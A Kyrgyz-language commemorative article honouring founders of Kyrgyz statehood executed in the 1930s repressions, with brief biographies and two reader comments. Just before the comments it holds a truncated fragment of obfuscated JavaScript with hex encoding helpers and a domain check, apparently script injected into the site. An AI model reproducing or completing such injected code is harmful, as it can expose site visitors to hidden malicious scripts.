Кыргыз АССРине – 80 жыл. Кыргыз ССРине – 90 жыл. Тарыхка жарык из калтырган мамлекеттик ишмерлер.

Кыргыз мамлекетин түптөгөндөр жана күчтөгөндөр

1-мамлекет

Азыркы биздин өз алдынча эгемендүү мамлекет болгонубузга салым кошууда, ушул эгемендүүлүктүн негизин түптөп берүүдө – өткөн кылымдагы Совет бийлиги келген учурдагы эл билгилеринин эмгеги зор жана баалуу.

Ошол учурдагы кыргыз эли чачырап турганда, бир ойду, бир максатты көздөгөн билгилер биримдикте болуп, бир баалуулуктун негизинде иш жүргүзүп, элибиздин келечегине кайдыгер болбой элдин биригүүсүнө кам көрүп, оор жагдайга карабастан күжүрмөндүктө иштешкен. (сүрөттө Кыргыз АССРинин Кеңешинин биринчи уюштуруу съездине арналган салтанаттуу митинги. 1927-жыл, март айы, Фрунзе шаары.)

Алардын эл алдындагы, мекен алдындагы зор иши Кыргыз мамлекетинин 1924-жылдын 14-октябрында автономиялык облус болуп түптөлүшүнөн башталат. Эгемендүүлүккө жол салып берген автономиялык облустун түптөлүшү  эбегейсиз тоскоолдуктарды  басып өтүү менен ишке ашкан. Акыры, бул чоң негиз ошол учурда чачырап турган кыргыз элин бир жерге уютту. Эркиндикти беттеген, элдин келечегине кам көргөн мамлекеттик ишмерлерибиздин андан аркы аракети менен, облус боюнча калып калбастан, 1926-жылдын 1-февралында Автономиялык  Республикага айландык.

Бул бийик ойду ишке ашырууда  өз мезгилинин кыйын кырдаалдарына баш ийбеген, багынбаган Жусуп Абдрахмановдун демилгеси түрткү болгон.  Жусуп Абдрахмановдун демилгесине кыргыздын мыкты уулдары Иманалы Айдарбеков менен Абдыкерим Сыдыков өздөрүнүн зор салымын кошкон жана бул инсандардын иши кийинки муунга үлгү болуп, дем берип, Кыргыз мамлекетинин өнүп-өсүшүнө жол ачып берген. Андан ары мамлекеттин өсүүсүнө өзүнүн эмгегин арнаган дагы бир мыкты уул – Баялы Исакеев болгон. Ал 1936-жылдын 5-декабрында Кыргыз Автономиялык респбликасынын Союздук республика болушуна чоң эмгек жумшаган.

Ошол учурдагы саясаттын карама-каршылыгына, өмүрүнө коркунуч келтирген абалга карабай эл-жерине  бийик кызмат кылган адамдардын эмгегин баалоо, алардын уютуп берген жакшылыгын андан ары өстүрүп-өркүндөтүп кетүү – албетте азыркы билгилердин милдети. Себеби, билгилер элдин уюткусу болуп, эл менен бийликтин көпүрөсү болуп турушу – чоң милдет.

Эл башындагы азыркы билгилер өз милдетин кандай аткарууда?

Уюткулук сапат ар бир адамга бериле бербейт. Бул жашоого келген соң, Кудай алдында ар бир адамдын жасап кетчү кызматы бар. Ошол кылган кызматы менен ар бир адам өмүрдүн баалуулугуна  жетет. Ар бир адамдын кызматына жараша ага тиешелүү күч-кубат, шык, жөндөм, дарамет берилет. Билгилерге да катардагы адамдардан айырмаланып, өзгөчө күч-кубат, дарамет берилген. Ар бир адам билгилик сапатка жете бербейт. Билгилик деңгээлге жеткен соң, ошол күчтү, ошол кубатты кайсыл багытка жумшап атат, кайсы баалуулукту көздөп атат – ушуну билгилер өздөрү илктеш керек.

Азыркы эл башында турган билгилер Кудай алдында, эл алдында өзүнүн милдетин аткарып атабы? Улуу муун жасап кеткен, кыргыздын чыгаан, кыраан уулдары уютуп кеткен ишти баалап атабы, улантып атабы? Даярдап берген нерсени өстүрүп, өркүндөп атабы? Мына ушундай суроолор туулат. Бул суроолордун жообун жашоонун мисалынан ачык-айкын көрсөк болот.

Азыркы билгилер өзүлөрүнүн милдетин тааныбастан, максатты байлыкка, бийликке, өзүлөрүнүн жеке кызыкчылыгына коюп  коюшкандай. Байыркы ата-бабаларыбыздын  эл-жер үчүн төккөн канын, кыйган жанын, коргоп-сактап берген жерин баалабай, алардын ишин уланткан кийинки чыгаандардын да эмгегин эске албай, күнүмдүк дүнүйөгө берилип, жерди башка улуттарга сатып, чиримдүү байлыкка малынышууда. Алар алганына тойбой, жеткенине ыраазы болбой, дагы-дагы байлыгымды көбөйтсөм деп жутунушат.

Кээде ушул билгилердин жасаганын көрүп, жедеп эле тегин тааныбай маңкурт болуп калышканбы дейсиң. Элге таанылган, эл башында турган билгилердин басымдуу көпчүлүгү элдин ишеничинен, сый-урматынан кеткени чындык. Ал эми сый-урматтан кеткен билги – коом ичинде, эл ичинде барксыз жана баасыз. Ал билги өзүн таасирлүүмүн деп эсептегени менен, ал өзүнүн жанындагы ага көз каранды болгон адамдарга гана таасирлүү. Анын бул таасири учурга эле тиешелүү. Аты алыска, даңкы далайга кетпейт.

Билги адамдар кандай болуу керек?

Билгилер ар тармактуу, багыттары ар бөлөк, баалуулуктары ар бөлөк болгону менен, алардын баарынын бирдей касиети бар – алар элдин куту. Бул мыйзам ченемдүү нерсе, бул жашоонун мыйзамы. Жогоруда айтылгандай, билгилик сапат ар бир адамга бериле бербейт. Эл билгини көрүп түздөнөт жана билгинин пикири менен эсептешип иш кылат. Элди биримдикке алып келип, туура багыт көрсөтүп, туура жолго салуу – билгилердин милдети.

Элдин куту болгон билгилер жашоонун тереңин тааныса, өзүнүн кубаттуу күчүн тааныса – анда ал өзүнүн күчүн келечекке жумшайт, коомдун бузулушуна жана бийликтегилердин аша чаап кеткендигине бөгөт боло алат. Билгилер бирдикте бир күч болуп бийликтегилерге өзүлөрүнүн талабын койсо, тууралыкты  талап кылса – коомго сөзсүз өзгөрүү келет.

Билгилердин биримдиги – элдин бүтүндүгү

Коомду өзгөртүүдө жалгыз бир билгинин күчү жетпейт, мындай чоң милдетти ишке ашырыш үчүн билгилердин биригүүсү зарыл. Ал биригүү бир ойдун, бир максаттын, бир баалуулуктун негизинде болуш керек. Ошондо гана билгилер бир чоң күчкө айланып, кубаттуу ишти жаратып, элдин өсүп- өркүндөөсүнө жол салып бере алат. Билгилер биримдикке келсе, караламан калкыбыздын да биримдиги бекемделип, бүтүндүгү сакталат жана өсүү, өнүгүү башталат. Андай элдин келечеги кең болот. Ал эми келечеги кең, өсүп-өнгөн эл – бирдиктүүлүккө жетет. Бирдиктүү эл кандай гана кырдаал, коркунуч же сыноо болбосун, баарына туруштук бере турган  улуу элге айланат.

Кыргыз  мамлекетин түптөп кеткен жарыктарга түбөлүк таазим!

Тагдырлары татаал мезгилге туш келген, чындыктан кайтпай өмүрлөрүн эл-жерге арнаган, кыргыздын кыргыздыгын баалаган, эркиндиги үчүн күрөшкөн, 1930-жылдардын соңунда репрессия курмандыгы болуп ак жеринен атууга кетишкен Жусуп Абдрахманов, Иманалы Айдарбеков, Абдыкадыр Орозбеков, Осмонаалы Сыдыков, Баялы Исакеев, Касым Тыныстанов, Төрөкул Айтматов, Ишенаалы Арабаев жана башка ушул сыяктуу  залкар аталарыбыздын жасап кеткен иши – айтып бүткүс.

Кыргыз  мамлекетин түптөп кеткен бул эл билгилерине түбөлүк таазим кылып, аларга жүрөк түпкүрүнөн терең ыраазычылык кылуу, өткөн тарыхыбызды бурмалабай урпактарга жеткирүү – бул биздин, кийинки муундардын ыйык милдети.

Тагдырларына туш келген өтө оор мезгилдерде сынып калбай, башка күчтүү мамлекеттерге жем болбой,  жерибиздин бир тилимин да сатпай, өз алдынча көз карандысыз мамлекет кылган аталардын баатырдык сапаты биз үчүн чоң үлгү жана сыймык!

3-Иманалы Айдарбеков

Иманалы АЙДАРБЕКОВ

Кыргыз мамлекеттүүлүгүн түзүүгө бүт акылын, күчүн жумшаган, жүрөгүн орноткон Иманалы Айдарбеков 1884-жылы Пишпек уездинде манаптын үй-бүлөсүндө жарык дүйнөгө келген. Орус-тузем мектебинен окуп бүтүргөн соң, Айдарбеков билимин андан ары тереңдетип, Пишпек айыл чарба мектебинен окуйт да, эмгек жолун Пишпек уездинин жетекчисинин жардамчысы жана котормочусу болуп баштайт. Мамлекеттик кызматты аркалап, кийин партиялык жана мамлекеттик ишмер катары калкка таанылат.

Кыргыз элинин келечеги үчүн күрөшкөн, Совет бийлигин чыңдоого баардык күч-кубатын жумшаган Иманалы Айдарбеков 1918-жылдын башынан РКП (б)га мүчөлүккө өтөт. Пишпек шаардык уездинин Кеңешинин мүчөсү катары ага төрагалык милдет берилет. 1924-жылы Кара-Кыргыз автономиялуу облусунун Ревкомунун төрагасы болуп дайындалат.

Кыргыз эгемендүүлүгүн түзгөн алгачкы адам Иманалы Айдарбеков кыргыз элинин, кыргыз жеринин келечеги үчүн кам көрүп, түндүктү Казакстанга, түштүктү Өзбекстанга кошуп жиберүү коркунучунан сактап калган. Жашоосундагы кысымдарга карабастан, өмүрүнүн аягына чейин Кыргыз мамлекетин түзүү аракеттеринен тайган жок.

1937-жылы Иманалы Айдарбековду камакка алышканда Совет бийлигин орнотууга өзү менен бирге иштешип жан үрөгөн Ишенаалы Арабаев, Жусуп Абдрахманов, Абдыкадыр Орозбеков, Баялы Исакеев, Төрөкул Айтматов, Касым Тыныстанов жана башка бекем санаалаш адамдарына каршы үгүттөшүп,  “аларды кыргыздын саткынчылары деп жазып бересиң” деп кыйноого алышып, бир жыл бою түрмөдө сабашкан. Эгерде Айдарбеков кордук көргөзгөндөрдүн айткандарына көнсө, камактан бошотушаарын билдиришкен. Бирок,  Айдарбеков өз өмүрүнөн, өз үй-бүлөсүнөн, жеке керт башынын эркиндигинен кыргыз элинин келечегин жана акыйкатты бийик коюп, “Мен өлсөм ишимди башкалар улап кетет” деген ишенимди карманган.Өзү менен кошо мамлекетти түптөшкөн кыргыз уулдарын “Эл душмандары” деп жазып бербегени үчүн Айдарбековдун өзүн гана аёосуз кордобостон, үй-бүлөсүнө да мыкаачылык жасашып, 22 жаштагы улуу кызы окуу жайдан чыгып келе жатканда кол салып өлтүрүшүп, анын сөөгү бир күндөн кийин көчөдөн табылган. Айдарбековдун бир туугандарын да өлтүрүшкөн. Ал эми 1938-жылы 5-ноябрда өзүн атууга кетиришкен.

 3-Абдыкерим СыдыковАбдыкерим СЫДЫКОВ

Бүгүнкү эгемендүү мамлекетибиздин жаралышына алгачкы жол салуучулардын бири, Кыргыз мамлекетин түзүүгө  жана аны чыңдоого талбай аракет жасаган Абдыкерим Сыдыков 1889-жылы Чүй өрөөнүндөгү Башкара-Суу айылында манаптын үй-бүлөсүндө жарык дүйнөгө келген. Алгач өзүнүн чоң атасы салдырган мусулман мектебинде окуп, андан соң 1904-жылдан 1911-жылга чейин Верный (Алматы) шаарындагы балдар гимназиясында окуган. Билимди тереңдетүү үчүн Казань университетинин ветеринария факультетине да тапшырган. Бирок, ал жактагы аба ырайы ден соолугуна тескери таасирин тийгизип, университетти бүтпөй калган. 1913-1916-жылдары Абдыкерим Сыдыков Нарын жана Каракол уездерине мектеп ачкан жана ал мектептерде өзү мугалим болуп иштеген. Ушул эле жылдары ал Пишпек уезддик башкармалыгында катчы жана котормочу болуп эмгек жолун баштаган.

Февраль революциясынан кийинки коомдун саясат таануусу Орто Азияда социал-демократиялык багыттагы ар кандай партиялардын пайда болушуна жол ачкан. Алардын бири «Алаш» кыргыз-казак партиясы болгон. А.Сыдыков коомдук-саясый иштен четте калбай, замандаштары И.Айдарбеков, К.Тыныстанов, И.Арабаев жана башкалар менен бирге «Алаш» партиясынын Кыргызстандагы жергиликтүү уюмун түзүп, анын башында турган. Бул мезгилде ал саясый ишмер катары калыптанып, келечекте кыргыз мамлекеттүүлүгүн түзүүгө белсенип киришине чоң тажрыйба топтогон.

1921-жылы Алматыда болгон кеңешмеде А.Сыдыков Түркстан АССРинин курамында Тоолуу Кыргыз облусун түзүү маселесин биринчи жолу көтөрүп чыккан. Бирок, бул иш анда колдоо тапкан эмес. Болжогон ишинен кайра тартпаган өжөрлүгү, оттой жанган кайратмандыгы анын өз алдынча кыргыз өлкөсүн түзүүгө белсенип киришине түрткү болгон.

1922-жылдын мартында Советтердин Бүткүл Түркстандык 13-съездинде А.Сыдыков кайрадан Тоолуу Кыргыз облусун түзүү жөнүндөгү маселени козгогон. 1922-жылы 25-мартта Түркстан АССРинин курамында Тоолуу Кыргыз облусун түзүү жөнүндө чечим чыгарылган. Анда Пишпек, Каракол, Нарын уезддери жана Олуя-Ата уездинин тоолуу бөлүгү кирген, борбору Кочкор кыштагы болгон Тоолуу Кыргыз облусун түзүү, А.Сыдыковду Тоолуу Кыргыз облусун уюштуруу комиссиясынын төрагалыгына бекитүү жагы каралган. Ошентип, кыргыздар жашаган аймактын бир бөлүгүндө бирдиктүү, өз алдынча улуттук автономиялуу мамлекет түзүү үчүн реалдуу мүмкүнчүлүктөр ачылган.

1922-жылы 4-июнда Пишпекте партиянын Жети-Суу обкомунун уюштуруу съезди чакырылып, ага 425 делегат катышкан. Ошентип, Пишпекте «Түркстан Республикасынын курамында өз алдынча Тоолуу облусту түзүү боюнча кара кыргыз эмгекчилеринин бул аймактагы улуттук азчылыктардын өкүлдөрүнүн катышуусундагы биринчи тарыхый даярдоочу съезди» салтанаттуу түрдө ачылган. Бул – Абдыкерим Сыдыковдун саясый таржымалындагы чечүүчү учур болгон. Бирок, чагымчылардын айынан съезддин жыйынтыгы чыкпай калган. Сталиндин түздөн-түз көрсөтмөсү менен съезд таркатылып, аны уюштургандарды буржуазиялык улутчулдар деп айыпташкан. Ошондой болсо да, бул алгачкы аракет текке кетпей,1924-жылы 14-октябрда Кара-Кыргыз автономиялуу облусу түзүлгөн. Мында А.Сыдыковдун бараандуу салымы бар экендиги албетте талашсыз.

Көрө албастардын айынан Абдыкерим Сыдыков 1922-1924-жылдардын аралыгында үч жолу партиядан чыгарылып, бирок, кайра партиялуулугу калыбына келтирилген. Мамлекеттик кызматтан четтетилген убагында Абдыкерим Сыдыков окутуучулук ишмердүүлүккө өтөт да, кыргыздын тунгуч гезити “Эркин Тоону” негиздеп, анын уюштуруучуларынын бири болот. Ошол убакта ал бир нече илимий эмгектердин автору болуп чыга келет.

1932-жылы Кыргыз АССРинин жетекчилеринин сунушу менен А.Сыдыков Кыргыз АССРинин мампланынын төрагасынын орун басары кызматына келет.Бирок, 1933-жылдын 9-майында камакка алынып, 1934-жылдын 28-февралында  “Социал-Туран”  улутчул контрреволюциялык уюмдун жетекчиси деп күнөө тагылып, 10 жылга эркинен ажыратылат. 1938-жылы 10-февралда Кыргыз ССРинин НКВДсынын чечими менен “Социал-Туран”  партиясынын уюштуруучуларынын бири катары күнөө тагылат.

Тоталитардык машинанын кандуу репрессиясынын чырмоогуна кабылган Абдыкерим Сыдыковго жалган жалаа жабылып, 1938-жылы 18-февралда өлүм жазасына тартылган.

3-Абдыкадыр ОрозбековАбдыкадыр ОРОЗБЕКОВ

Кыргыз мамлекетин түптөөдө, аны өз алдынча мамлекет кылууда жана жер-жерлерде совет өкмөтүнүн бекемделишине чоң салым кошкон Абдыкадыр Орозбеков 1889-жылы Баткен облусуна караштуу Кадамжай районунда жарыкка келген. Өлбөстүн күнүн көргөн жакыр үй-бүлөдөн чыккан Абдыкадыр Орозбеков кабыргасы ката элек чагынан тартып байлардын пахта талааларында, андан соң Фергана, Кокон, Анжиян калааларындагы ишканаларда жумушчу болуп иштеп, жалчылыктын азабын тарткан.

1916-жылы А.Орозбеков администрациянын резервдеги жашы өйдөлөп калган жумушчуларды аскерге алуу жөнүндөгү буйругу менен чакырылган Анжиян шаарындагы иш таштоого катышкан. Ал эми 1917-жылдын январында ал өзү иш таштоого жетекчилик кылып, мында наабайкананын жумушчулары жеңишке жетишкен эле. А.Орозбеков кожоюнунун жалаасы боюнча камакка алынып, бирок, жумушчулардын кысымы менен абактан тез эле бошонуп чыккан.

Февраль революциясынын күндөрүн Абдыкадыр Орозбеков Фергана шаарында өткөргөн. Анда ал наабайчылардын, кол өнөрчүлөрдүн, шахтёрлордун ж.б. секцияларын уюштуруу иштери менен алектенчү. Кийин ошол секциялар Чебер жумушчулар жана кызматчылар союзуна биригип, большевиктердин жетекчилиги астында кезектеги саясый күрөштө маанилүү роль ойногон. Убактылуу өкмөткө каршы күрөштүн тушунда А.Орозбеков Чебер жумушчулар жана кызматчылар союзу тарабынан жумушчу-солдат депутаттардын Фергана облустук кеңешине, Маргалаң уезддик жана шаардык аткаруу комитеттеринин президиумуна мүчө болуп шайланат. 1918-жылы 6-августта большевиктердин катарына өтөт. Ушундан баштап ал Совет бийлиги үчүн тикесинен тик турат.

1920-жылы бир эле мезгилде Чимион революциялык комитетинин төрагасы, Үч-Коргон кантондук аткаруу комитетинин төрагасынын орун басары, Маргалаң кантондук аткаруу комитетинин төрагасы кызматтарын ээлеп турганда басмачылар отряддарына каршы согуштарга катышып, айыл- кыштактарда Совет бийлигин чыңдоо үчүн күрөшөт.

1926-жылдын 1-февралында А.Орозбеков  Кыргыз АССРнин Президиумунун төрагалыгына шайланган.  Ал эми 1927-жылы 7-12-мартта Пишпекте өткөн Кыргыз АССРинин Советтеринин биринчи уюштуруучу курултайында  Кыргыз АССРнин Борбордук аткаруу комитетинин төрагасы болуп шайланат. 1936-жылы болсо Кыргыз ССР Борбордук Аткаруу Комитетинин төрагасы болуп депутаттар тарабынан шайланган.

Балтыр эти толо элек чагынан кедейчиликти башынан кечирип, ысык-суукка урунуп жүрүп республиканын жетекчилик кызматына келген Абдыкадыр дайыма эмгекчил элдин абалына күйүп-бышып, аларды бакубат жашоого алып келүүгө бүт күчүн жумшаган. Ал элеттин жашоосун, эмгекчил элдин турмушун жакшы билген, ошондуктан, акыркы деми калгыча, каруусун казык, канын азык кыла өзүн элдик ишке арнаган.

Бирок,Кыргызстандын мамлекет башчысы болгон Абдыкадыр Орозбековго жалган айып тагылып, ак жеринен караланып, 1937-жылы 20-сентябрда камакка алынат. Аны 8 ай бою катуу кыйноого алышып, 1938-жылдын 28-майында атууга кетиришкен.

3-Жусуп АбдрахмановЖусуп АБДРАХМАНОВ

Кыргызстандын өз алдынчалыкка жетүүсүнө өмүрүн арнаган улуу инсан Жусуп Абдрахманов 1901-жылдын 28-декабрында Ысык-Көл районунда, манаптын үй-бүлөсүндө жарыкка келген. Алгач орус-тузем мектебинде окуп, кийин Караколдогу жогорку башталгыч окуу жайда билим алып жатканда, 1916-жылдагы үркүн чыгып, жеринен качкан эл менен кошо Кытайга кетип, февраль революциясынан кийин туулган жерине кайткан. Келгенден кийин Каракол гарнизонундагы офицердин үйүндө атчы, кароолчу болуп иштеген.

Анын табиятынан зээндүү, дилгир экендигин байкаган подполковник Бычков өзү менен кошо Верный (Алматы) шаарына алып барган. Бул жерде совет бийлиги орногондон кийин, кат сабаттуу Жусуп бир канча ай статистика тармагында эмгектенип, андан соң Морозовдун кызыл гвардиялык отрядына кирет. Гвардияда жүргөн кезинде Жусуп командирдин жардамчысы болуп, Жети-Суу фронтунда актарга каршы күрөшкөн. Абдрахмановдон келечектеги мыкты аскер адамы чыгат деген үмүт менен жогорку жактан Верный шаарына командирлик курска, кийин Ташкенттеги В.И.Ленин атындагы аскердик окуу жайга жиберишет. Бирок, ден соолугу анын келечектеги аскер адамы болушуна чоң тоскоол болуп, аргасыз аскердик карьерасын токтотууга мажбур болот.

Советтик дух менен 1919-жылы Жусуп Абдрахманов кыргыз жаштарынын алдыңкы өкүлү катары комсомолго өтөт. Анын таалайына жазылган саясый ишмердиги дагы ошол чөйрөдөн башталган. Абдрахманов 1920-жылы РКСМдин (Российский коммунистический союз молодежи) 3-съездине Кыргызстандын атынан барган. Ушул съездде Жусуп Абдрахманов коммунисттердин жол башчысы В.И.Ленин менен жолугуп сүйлөшкөн.

1926-жылдын 1-февралында Кыргыз автономиялык ССРинин түзүлүшү анын тынымсыз аракети менен ишке ашкан. Абдрахманов дайыма Кыргызстан  РСФСРдын курамындагы автономиялык облус  болуу менен чектелбестен, өз алдынча республика болушуна толук негиз бар экендигин далилдеп келген. 19 жашынан тартып мамлекеттик, партиялык кызматта иштеген Абдрахманов 26 жашында, тактап айтканда 1927-жылдын март айынан 1933-жылдын сентябрына чейин Кыргыз АССР Эл комиссарлар советинин төрагасы болгон. Республиканын өкмөтүнүн башында турган кезинде өзгөчө тайманбас, борбордун көзүн карабаган саясат жүргүзөт. Жаңы гана түзүлгөн жана мурда эчтекеси болбогон жаш республикада бардык жумушту чымырканып нөлдөн баштайт; эл чарбасынын бардык тармактарын, баарынан мурда, айыл чарбалык жана өнөр жайлык комплексти түзүүнүн, билим берүү тармагын, сот-прокуратураны, милицияны ж.у.с. жаңыдан түзүүнүн башында турат.

1932-1933-жылдары Сталиндик өлкөнү индустрилизациялоо саясаты жүрүп, оор өнөр жайды куруу үчүн дан азыктарынын баары сыртка экспортко чыгарылып, сырттан болсо өнөр жайга керектүү  материалдар алып келингендиктен, СССРде катуу ачарчылык болгон.  СССРдин дан эгиндерин өндүргөн аймактарда: Украина, Казакстан, Поволжьеде өзгөчө катуу болуп, адамдар ачкачылыктан кырыла баштаган. Пландуу экономикалык саясаттын негизинде дан даярдоо планы таңууланып, реалдуулуктан бир топ четтеп кеткен. Ушундай шартта Элкомсовдун председатели (өкмөт башчы) Жусуп Абдрахманов көрсөтүлгөн планды азайтууга мажбур болуп, эл ачарчылыктан кырылып калбасын деп, үрөн фондусунан дан берип, пайдаланууга уруксат кылган. Анын принциптүү, адамгерчиликтүү позициясы менен дан өз керектөөлөр үчүн да калтырылып, Кыргызстанда ачарчылык болгон эмес. Бирок, карапайым элди ачарчылыктан сактап калган дал ушу эрдиги үчүн аны «эл душманына» айландырышты. Ошол кезде коңшу казактардан ачарчылыктан улам бир канча миңдеген адам кырылып, дагы бир тобу Кыргызстанга келип жан сактаган. Өзүнүн күндөлүгүндө Абдрахманов ал жөнүндө мындай деген: «1932-жылы жазында казактар Кыргызстанга күтүрөп келе баштады. Ачарчылыктын айынан алардын арасында өлүм-житим көп болду. План өткөрүү кыйынчылыгын Шахрай, Исакеев үчөөбүз талкуулап келип, мен: «План аткарбады деп кызматтан алса алсын, республиканы Казакстандын абалына жеткирбейм» дедим. Алар макул болду”.

Мына ошентип, анын эл үчүн жасаган эмгегин кара ишке айлантышып, 1933-жылы кызматтык сүргүнгө айдалып, 1937-жылы камакка алынып, 1938-жылы 5-ноябрда атылган.

3-Баялы ИсакеевБаялы ИСАКЕЕВ

Кыргыз мамлекеттүүлүгүнүн калыптанышына чоң салым кошкон улуу инсандарыбыздын бири – Баялы Исакеев 1897-жылы Нарын облусунун Кочкор районунун Үкөк айылында жарык дүйнөгө келген.

Бала чагынан жетимчиликтин азабын тарткан Исакеев алгач Нарын шаарындагы орус-тузем мектебинде билим алып сабатсыздыгын жойгон. 19 жашка келгенде Үркүн башталып, өз эли менен бирге Кытайга качкан. Ал жактан башкалар сыяктуу эле көрбөгөн кордукту көрүп, “ак падыша кулады” деген кабар жеткенден кийин жакындары менен мекенге кайтып келген. Кыргызстанга келгени менен жашоо мурдагыдан да оор болуп, бирок бир кездеги алган билиминин аркасы менен Орто-Токой почта станциясында иштеп, анын башчылыгына чейин көтөрүлгөн.

1918-жылы жашоосундагы эң чоң жоготууга кабылып, бир эле учурда апасы, карындашы, агасы жана бир инисинен ажыраган. Октябрь революциясынын жеңиши анын жашоого болгон үмүтүн жандырып, тилегин арттырып, эл-жерге ак кызмат өтөөгө өзүн арнап, 1920-жылы партиянын катарына кирип, кат сабаты жоюлган адис катары партиялык кызматтарга ишке алынган.

Анын билими жана карапайым калк менен иштеше билген жөндөмдүүлүгү тез эле калк ичинде чоң кадыр-баркты алып келип, жогорку жактагылар дагы анын уюштуруучулук сапатын баалашып, 1922-жылы Нарын уезддик партиялык комитетинин төрагасы кылып дайындашкан. 1923-жылы билимин жогорулатуу жана учур талабына ылайык илим-билимге ээ болуу максатында  Орто Азиядагы келечектеги коммунисттерди тарбиялап чыгаруучу Ташкентте жайгашкан Коммунисттик университетине тапшырган. Ал эми 1924-1925-жылдары Лепси жана Каракол уезддеринде иштеп жатканда, 1925-жылы Мосвкадагы партиянын алдындагы тогуз айлык курска жөнөтүлөт. Бул тогуз айлык окуу Исакеевдин кийинки мамлекеттик ишмер катары калыптанышына зор таасирин тийгизген.

Кыргызстанга келгенден соң партиялык кызматка өтүп, Киробкомдун (Кыргыз облустук комитети) агитпропаганда боюнча бөлүмүнүн башчысы кызматына келген. Ошол кездеги үгүт-насаат бөлүмүнүн алдында турган эң чоң тапшырма: кыргыздардын маданий деңгээлин көтөрүү, сабатсыздыкты жоюу, кедей-кембагалдарды жумушка тартуу болгон. Андан тышкары айылдарды куруу, деңгээлин жогорулатуу жана коллективдештирүүнү ишке ашыруу маселеси коюлган. 1929-жылы анын айылдан чыккан адис экендиги эске алынып, жер иштетүү боюнча эл комиссары (министри) болуп дайындалат.

Баялы Исакеев республикадагы партиянын экинчи адамына чейинки орунга көтөрүлөт. 1933-жылы Борбордук комитеттин чечими менен Жусуп Абдрахманов Эл комиссарлар советинин төрагалык кызматынан бошоп, анын ордуна Баялы Исакеев келген. Бул жылдар социализмдин өтө карама-каршылыктуу өнүгүп келе жаткан учуру болгон. Саясый жактан сталиндик тазалоо саясаты башталып, анын эпкини кыргыздарга да жетип, бири-бирин аңдымай, үстүнөн арыз жазып каматмай оюндары башталган. Социалдык-экономикалык жактан болсо коллективдештирүү менен индустрилизациялоо башталып, ага массаны тартуу дагы бир топ кыйынчылыктар менен коштолгон. Өзгөчө колхоздошторуу саясаты көпчүлүк тарабынан тескери кабылданып, бир кездеги эскини самагандардын куйруктары тарабынан элди тескери жакка козутуп турган. Ушундай оор кырдаалда өлкөнү чарбалык экономикалык жактан тартипке салуу, аларды оң жолго коюу Баялы Исакеев жетектеген өкмөттүн милдети болгон.

Совет мамлекети түптөлүп курула баштагандан тартып эле улуттук мамлекетти куруу маселеси кыргыз интеллигенциясы жана партиялык кызматкерлери тарабынан алдыңкы орунга чыккан. Кыргыз элинин союздун курамындагы тең укуктуу мамлекетке ээ болуу маселеси Абдыкерим Сыдыков, Жусуп Абдрахманов, Баялы Исакеев, Ишеналы Арабаев жана башка саясый-партиялык кызматкерлер тарабынан бир канча ирет көтөрүлүп, айрымдары бул идея үчүн кызматтан дагы айдалган. Акыры союздук, тең укуктуу мамлекет болуу бактысы 1936-жылга туш келген жана СССРдин курамындагы Кыргыз ССРинин эл комиссарлар советинин төрагалык кызматы Баялы Исакеевге тапшырылган.

Исакеев Өкмөт башчылык кызматта иштеп жатканда Кыргыз республикасы ар тараптуу өнүгүү менен союздук курамдагы толук кандуу мамлекетке айланды. Алсак, калктын сабаттуулугу 3 пайыздан 60 пайызга жогоруласа, өлкөдө үч Жогорку окуу жайы ачылып, миңден ашык студент билим алган. Ал Өкмөт башчылык кылып турган жылдары Фрунзе, Рыбачье-Торугарт жана Фрунзе-Ош жолдору курулган.

Бирок, анын партия үчүн, эл үчүн жасаган аракеттеринин баарына “улутчулдук” деген жалаа жабылган. Буга 1937-жылдын август-сентябрь айында “Правда” гезитине жазылган “Буржуазиялык улутчулдар” жөнүндөгү макала негиз болуп берген. Баялы Исакеев 1937-жылы камакка алынып, 1938-жылы атууга кеткен.

Даярдаган Атыргүл АБДРАЕВА

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kok-asaba.journalist.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

3 thoughts on “Кыргыз АССРине – 80 жыл. Кыргыз ССРине – 90 жыл. Тарыхка жарык из калтырган мамлекеттик ишмерлер.

  1. Мындан башка да ошол мезгилде алгачкы большевик, Казак-кыргыз аскер комиссарынын орун басары Ыйманбай Орозалиев, ВКП (б)нын Орто Азия бюросунун жоопту катчысы Баатыркан Мээрканов дегендер болгон. Ыйманбай Орозалиев Р. Худайкуловдун тобу тарабынан өлтүрүлсө, Баатыркан Мээркановду 1931-жылдары Ташкент шаарында үйүнө кирип бара жатканда атып салышкан.

  2. Ыйманбай Ленин менен тааныш болгон

    Россиядагы 1917-жылдагы буржуазиялык-демократиялык февраль революциясынын жеңгендиги тууралуу кабар Кыргызстанга март айынын башында угулат.
    Пишпек, Ош сыяктуу уезддик борборлорунда Чүй сугат каналдарында, көмүр кендеринде толкундоолор болуп, митингдер өтөт.
    Саясий камактагылар бошотулат. Бөрүбай Кененсарин өзүнүн “Февраль революциясы” деген эмгегинде:
    1916-жылы Пишпектеги 6 болуш элден 120 жигитти тылдагы жумушка айдады. Биз Жаңы-Жерден батышты карай Ат-Башы каналын казып жүрдүк. 1917-жылы Оренбург шаарында чыга турган “Бакыт” деген журналдан падыша Николай тактан түшүп, баласы Алексейди, андан тууганы Михаилди падыша кылган төрт указды жазганын окудук. Аңгыча Князь Львов деген өкмөт болуп, кийин бир аздан соң Керенский убактылуу өкмөт түзгөнүн уктук.
    Ошо кезде фронттон Орозалин Ыйманбай деген жигит келди. Мен аны менен тааныштым. Анан ошол Орозалин Ыйманбай мага “Карл Маркс, Фридрих Энгельс, Владимир Ульянович Ленин деген адамдар ким экенин түшүндүрдү. Пишпекте Иваницин деген көгала мурутчан киши большевиктердин лидери экенин, жардамчылар аны ээрчип большевик болгонун, тилмечтер меньшевикке өткөнүн, өзү большевик экенин түшүндүрдү.
